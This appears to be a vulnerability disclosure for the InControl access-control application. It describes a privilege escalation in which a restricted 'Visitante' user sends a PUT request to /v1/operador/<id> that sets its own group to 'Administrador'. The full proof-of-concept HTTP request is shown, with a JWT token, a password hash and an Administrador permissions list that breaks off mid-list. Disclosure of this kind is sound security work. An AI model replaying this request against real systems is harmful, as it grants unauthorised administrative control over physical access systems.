| Description | A critical vulnerability was found in the InControl software. The vulnerability is an Improper Handling of Insufficient Permissions or Privileges that leads to Elevation of Privileges inside the application: a "Visitante" profile with very restricted permissions can obtain Admin access in the application. The vulnerable request is a PUT request on /v1/operador/<id>, which is an update-profile request; the application fails to check whether the user is allowed to modify its own attributes, so the user can modify its own permissions (in the request below, the `user.groups` field of the body is set to the "Administrador" group), leading to privilege escalation.
PUT /v1/operador/4 HTTP/1.1
Host: localhost:4441
Content-Length: 18599
Authorization: JWT eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjo0LCJ1c2VybmFtZSI6InBlbnRlc3RlciIsImV4cCI6MTc1MDI5NTIyNywiZW1haWwiOiIiLCJpc19hY3RpdmUiOnRydWUsImlzX3N1cGVydXNlciI6ZmFsc2UsInBlc3NvYSI6eyJub21lIjoicGVudGVzdGVyIn0sInBlcm1pc3Npb25zIjp7InZpc2l0YW50ZSI6eyJ2aXNpdGFudGUiOnsiaWRfcGVybWlzc2FvX2FkZCI6MTMzLCJpZF9wZXJtaXNzYW9fY2hhbmdlIjoxMzQsImlkX3Blcm1pc3Nhb19kZWxldGUiOjEzNSwiaWRfcGVybWlzc2FvX3ZpZXciOjEzNn19fX0.Gady04763SMCI0L1kOroIo4JQOCi-9fQpB0__mns6_Q
Accept-Language: pt-BR,pt;q=0.9
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/x.x.x.x Safari/537.36
Accept: application/json, text/plain, */*
Content-Type: application/json
Origin: https://localhost:4445
Referer: https://localhost:4445/
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
{"id":4,"pessoa":{"id":8,"nome_completo":"pentester","email":"[email protected]","telefone_celular":null,"telefone_residencial":null,"grupo":null,"imagem":null,"empresa":null,"tem_pendencias":false},"user":{"id":4,"username":"pentester","password":"pbkdf2_sha256$150000$sgWi9Jlst7dj$/3ZnZAgXCpPnBnaDYBH3s9Q/JdUDJWjqjHvX85rIRag=","groups":{"id":1,"name":"Administrador","permissions":[{"id":37,"codename":"add_acaoevento","content_type":{"id":10,"app_label":"acoes_eventos","model":"acaoevento"}},{"id":38,"codename":"change_acaoevento","content_type":{"id":10,"app_label":"acoes_eventos","model":"acaoevento"}},{"id":39,"codename":"delete_acaoevento","content_type":{"id":10,"app_label":"acoes_eventos","model":"acaoevento"}},{"id":40,"codename":"view_acaoevento","content_type":{"id":10,"app_label":"acoes_eventos","model":"acaoevento"}},{"id":385,"codename":"add_alertasonoro","content_type":{"id":97,"app_label":"alerta_sonoro","model":"alertasonoro"}},{"id":386,"codename":"change_alertasonoro","content_type":{"id":97,"app_label":"alerta_sonoro","model":"alertasonoro"}},{"id":387,"codename":"delete_alertasonoro","content_type":{"id":97,"app_label":"alerta_sonoro","model":"alertasonoro"}},{"id":388,"codename":"view_alertasonoro","content_type":{"id":97,"app_label":"alerta_sonoro","model":"alertasonoro"}},{"id":45,"codename":"add_antipassbackdispositivo","content_type":{"id":12,"app_label":"antipassback","model":"antipassbackdispositivo"}},{"id":46,"codename":"change_antipassbackdispositivo","content_type":{"id":12,"app_label":"antipassback","model":"antipassbackdispositivo"}},{"id":47,"codename":"delete_antipassbackdispositivo","content_type":{"id":12,"app_label":"antipassback","model":"antipassbackdispositivo"}},{"id":48,"codename":"view_antipassbackdispositivo","content_type":{"id":12,"app_label":"antipassback","model":"antipassbackdispositivo"}},{"id":53,"codename":"add_area","content_type":{"id":14,"app_label":"area","model":"area"}},{"id":54,"codename":"change_area","conte
nt_type":{"id":14,"app_label":"area","model":"area"}},{"id":55,"codename":"delete_area","content_type":{"id":14,"app_label":"area","model":"area"}},{"id":56,"codename":"view_area","content_type":{"id":14,"app_label":"area","model":"area"}},{"id":49,"codename":"add_historicalarea","content_type":{"id":13,"app_label":"area","model":"historicalarea"}},{"id":50,"codename":"change_historicalarea","content_type":{"id":13,"app_label":"area","model":"historicalarea"}},{"id":51,"codename":"delete_historicalarea","content_type":{"id":13,"app_label":"area","model":"historicalarea"}},{"id":52,"codename":"view_historicalarea","content_type":{"id":13,"app_label":"area","model":"historicalarea"}},{"id":321,"codename":"add_arquivo","content_type":{"id":81,"app_label":"arquivo","model":"arquivo"}},{"id":322,"codename":"change_arquivo","content_type":{"id":81,"app_label":"arquivo","model":"arquivo"}},{"id":323,"codename":"delete_arquivo","content_type":{"id":81,"app_label":"arquivo","model":"arquivo"}},{"id":324,"codename":"view_arquivo","content_type":{"id":81,"app_label":"arquivo","model":"arquivo"}},{"id":345,"codename":"add_camera","content_type":{"id":87,"app_label":"camera","model":"camera"}},{"id":346,"codename":"change_camera","content_type":{"id":87,"app_label":"camera","model":"camera"}},{"id":347,"codename":"delete_camera","content_type":{"id":87,"app_label":"camera","model":"camera"}},{"id":348,"codename":"view_camera","content_type":{"id":87,"app_label":"camera","model":"camera"}},{"id":354,"codename":"change_progressocomunicacao","content_type":{"id":89,"app_label":"comunicacao_progress","model":"progressocomunicacao"}},{"id":261,"codename":"add_assusersdkdispositivosdk","content_type":{"id":66,"app_label":"credencial","model":"assusersdkdispositivosdk"}},{"id":262,"codename":"change_assusersdkdispositivosdk","content_type":{"id":66,"app_label":"credencial","model":"assusersdkdispositivosdk"}},{"id":263,"codename":"delete_assusersdkdispositivosdk","content_type":{"id":6
6,"app_label":"credencial","model":"assusersdkdispositivosdk"}},{"id":264,"codename":"view_assusersdkdispositivosdk","content_type":{"id":66,"app_label":"credencial","model":"assusersdkdispositivosdk"}},{"id":273,"codename":"add_credencialmipip","content_type":{"id":69,"app_label":"credencial","model":"credencialmipip"}},{"id":274,"codename":"change_credencialmipip","content_type":{"id":69,"app_label":"credencial","model":"credencialmipip"}},{"id":275,"codename":"delete_credencialmipip","content_type":{"id":69,"app_label":"credencial","model":"credencialmipip"}},{"id":276,"codename":"view_credencialmipip","content_type":{"id":69,"app_label":"credencial","model":"credencialmipip"}},{"id":249,"codename":"add_historicalbiometriadigital","content_type":{"id":63,"app_label":"credencial","model":"historicalbiometriadigital"}},{"id":250,"codename":"change_historicalbiometriadigital","content_type":{"id":63,"app_label":"credencial","model":"historicalbiometriadigital"}},{"id":251,"codename":"delete_historicalbiometriadigital","content_type":{"id":63,"app_label":"credencial","model":"historicalbiometriadigital"}},{"id":252,"codename":"view_historicalbiometriadigital","content_type":{"id":63,"app_label":"credencial","model":"historicalbiometriadigital"}},{"id":245,"codename":"add_historicalcartao","content_type":{"id":62,"app_label":"credencial","model":"historicalcartao"}},{"id":246,"codename":"change_historicalcartao","content_type":{"id":62,"app_label":"credencial","model":"historicalcartao"}},{"id":247,"codename":"delete_historicalcartao","content_type":{"id":62,"app_label":"credencial","model":"historicalcartao"}},{"id":248,"codename":"view_historicalcartao","content_type":{"id":62,"app_label":"credencial","model":"historicalcartao"}},{"id":269,"codename":"add_historicalcontroleremoto","content_type":{"id":68,"app_label":"credencial","model":"historicalcontroleremoto"}},{"id":270,"codename":"change_historicalcontroleremoto","content_type":{"id":68,"app_label":"credencial
","model":"historicalcontroleremoto"}},{"id":271,"codename":"delete_historicalcontroleremoto","content_type":{"id":68,"app_label":"credencial","model":"historicalcontroleremoto"}},{"id":272,"codename":"view_historicalcontroleremoto","content_type":{"id":68,"app_label":"credencial","model":"historicalcontroleremoto"}},{"id":285,"codename":"add_historicalplaca","content_type":{"id":72,"app_label":"credencial","model":"historicalplaca"}},{"id":286,"codename":"change_historicalplaca","content_type":{"id":72,"app_label":"credencial","model":"historicalplaca"}},{"id":287,"codename":"delete_historicalplaca","content_type":{"id":72,"app_label":"credencial","model":"historicalplaca"}},{"id":288,"codename":"view_historicalplaca","content_type":{"id":72,"app_label":"credencial","model":"historicalplaca"}},{"id":257,"codename":"add_usersdkimage","content_type":{"id":65,"app_label":"credencial","model":"usersdkimage"}},{"id":258,"codename":"change_usersdkimage","content_type":{"id":65,"app_label":"credencial","model":"usersdkimage"}},{"id":259,"codename":"delete_usersdkimage","content_type":{"id":65,"app_label":"credencial","model":"usersdkimage"}},{"id":260,"codename":"view_usersdkimage","content_type":{"id":65,"app_label":"credencial","model":"usersdkimage"}},{"id":109,"codename":"add_historicaldepartamento","content_type":{"id":28,"app_label":"departamento","model":"historicaldepartamento"}},{"id":110,"codename":"change_historicaldepartamento","content_type":{"id":28,"app_label":"departamento","model":"historicaldepartamento"}},{"id":111,"codename":"delete_historicaldepartamento","content_type":{"id":28,"app_label":"departamento","model":"historicaldepartamento"}},{"id":112,"codename":"view_historicaldepartamento","content_type":{"id":28,"app_label":"departamento","model":"historicaldepartamento"}},{"id":85,"codename":"add_dispositivoencontrado","content_type":{"id":22,"app_label":"dispositivo","model":"dispositivoencontrado"}},{"id":86,"codename":"change_dispositivoencontrad
o","content_type":{"id":22,"app_label":"dispositivo","model":"dispositivoencontrado"}},{"id":87,"codename":"delete_dispositivoencontrado","content_type":{"id":22,"app_label":"dispositivo","model":"dispositivoencontrado"}},{"id":88,"codename":"view_dispositivoencontrado","content_type":{"id":22,"app_label":"dispositivo","model":"dispositivoencontrado"}},{"id":93,"codename":"add_historicaldispositivo","content_type":{"id":24,"app_label":"dispositivo","model":"historicaldispositivo"}},{"id":94,"codename":"change_historicaldispo |
|---|